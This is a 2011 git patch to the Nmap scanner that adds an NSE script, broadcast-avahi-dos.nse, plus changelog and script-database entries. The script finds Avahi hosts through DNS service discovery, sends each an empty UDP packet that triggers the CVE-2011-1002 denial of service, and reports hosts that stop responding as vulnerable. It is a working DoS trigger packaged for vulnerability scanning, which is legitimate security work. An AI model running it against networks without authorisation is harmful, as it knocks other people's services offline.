From 9e60e88eca054d845c7219fb8b29d1466f619123 Mon Sep 17 00:00:00 2001
From: djalal <djalal@e0a8ed71-7df4-0310-8962-fdc924857419>
Date: Mon, 2 May 2011 23:38:18 +0000
Subject: [PATCH] o [NSE] Added broadcast-avahi-dos.nse, which tries to detect
 if the   hosts in the local network that are running Avahi are vulnerable to 
  the NULL UDP packet denial of service (CVE-2011-1002).

---
 CHANGELOG                       |   4 ++
 scripts/broadcast-avahi-dos.nse | 105 ++++++++++++++++++++++++++++++++
 scripts/script.db               |   1 +
 3 files changed, 110 insertions(+)
 create mode 100644 scripts/broadcast-avahi-dos.nse

diff --git a/CHANGELOG b/CHANGELOG
index c263a56ce..6530fe982 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,9 @@
 # Nmap Changelog ($Id$); -*-text-*-
 
+o [NSE] Added broadcast-avahi-dos.nse, which tries to detect if the 
+  hosts in the local network that are running Avahi are vulnerable to
+  the NULL UDP packet denial of service (CVE-2011-1002). [Djalal]
+
 o [Zenmap] Fixed an error that could cause a crash ("TypeError: an
   integer is required") if a sort column in the ports table was unset.
   [David]
diff --git a/scripts/broadcast-avahi-dos.nse b/scripts/broadcast-avahi-dos.nse
new file mode 100644
index 000000000..94b874cbc
--- /dev/null
+++ b/scripts/broadcast-avahi-dos.nse
@@ -0,0 +1,105 @@
+description=[[
+Attempts to discover hosts in the local network using the DNS Service
+Discovery protocol and sends a NULL UDP packet to each host to test
+if it is vulnerable to the Avahi NULL UDP packet denial of service
+(CVE-2011-1002).
+
+The <code>broadcast-avahi-dos.wait</code> script argument specifies how
+many number of seconds to wait before a new attempt of host discovery.
+Each host who does not respond to this second attempt will be considered
+vulnerable.
+
+Reference:
+* http://avahi.org/ticket/325
+* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002 
+]]
+
+
+---
+-- @usage
+-- nmap --script=broadcast-avahi-dos
+--
+-- @output
+-- | broadcast-avahi-dos: 
+-- |   Discovered hosts:
+-- |     10.0.1.150
+-- |     10.0.1.151
+-- |   After NULL UDP avahi packet DoS (CVE-2011-1002).
+-- |   Hosts that seem down (vulnerable):
+-- |_    10.0.1.151
+--
+-- @args broadcast-avahi-dos.wait Wait time in seconds before executing
+--       the check, the default value is 20 seconds.
+
+
+author = "Djalal Harouni"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"broadcast", "dos", "intrusive", "vuln"}
+
+require 'stdnse'
+require 'dnssd'
+
+prerule = function() return true end
+
+avahi_send_null_udp = function(ip)
+  local socket = nmap.new_socket("udp")
+  local status = socket:sendto(ip, 5353, "")
+  socket:close()
+  return status
+end
+
+action = function()
+  local wtime = stdnse.get_script_args("broadcast-avahi-dos.wait") or 20
+  local helper = dnssd.Helper:new()
+  helper:setMulticast(true)
+	
+  local status, result = helper:queryServices()
+  if (status) then
+    local output, hosts, tmp = {}, {}, {}
+    for _, hostcfg in pairs(result) do
+      for k, ip in pairs(hostcfg) do
+      	if type(k) == "string" and k == "name" then
+      	  if avahi_send_null_udp(ip) then
+      	    table.insert(hosts, ip)
+      	    tmp[ip] = true
+      	  end
+        end
+      end
+    end
+
+    if next(hosts) then
+      hosts.name = "Discovered hosts:"
+      table.insert(output, hosts)
+      table.insert(output,
+          "After NULL UDP avahi packet DoS (CVE-2011-1002).")
+
+      stdnse.print_debug(3, "sleeping for %d seconds", wtime)
+      stdnse.sleep(wtime)
+      -- try to re-discover hosts
+      status, result = helper:queryServices()
+      if (status) then
+        for _, hostcfg in pairs(result) do
+          for k, ip in pairs(hostcfg) do
+            if type(k) == "string" and k == "name" and tmp[ip] then
+              tmp[ip] = nil
+            end
+          end
+        end
+      end 
+
+      local vulns = {}
+      for ip, _ in pairs(tmp) do
+        table.insert(vulns, ip)
+      end
+
+      if next(vulns) then
+        vulns.name = "Hosts that seem down (vulnerable):"
+        table.insert(output, vulns)
+      else
+        table.insert(output, "Hosts are all up (not vulnerable).")
+      end
+      
+      return stdnse.format_output(true, output)
+    end
+  end
+end
diff --git a/scripts/script.db b/scripts/script.db
index 9f0c4e1f7..64939d89e 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -8,6 +8,7 @@ Entry { filename = "auth-owners.nse", categories = { "default", "safe", } }
 Entry { filename = "auth-spoof.nse", categories = { "malware", "safe", } }
 Entry { filename = "backorifice-info.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "banner.nse", categories = { "discovery", "safe", } }
+Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } }
 Entry { filename = "broadcast-dns-service-discovery.nse", categories = { "broadcast", "safe", } }
 Entry { filename = "broadcast-dropbox-listener.nse", categories = { "broadcast", "safe", } }
 Entry { filename = "broadcast-ms-sql-discover.nse", categories = { "broadcast", "discovery", "safe", } }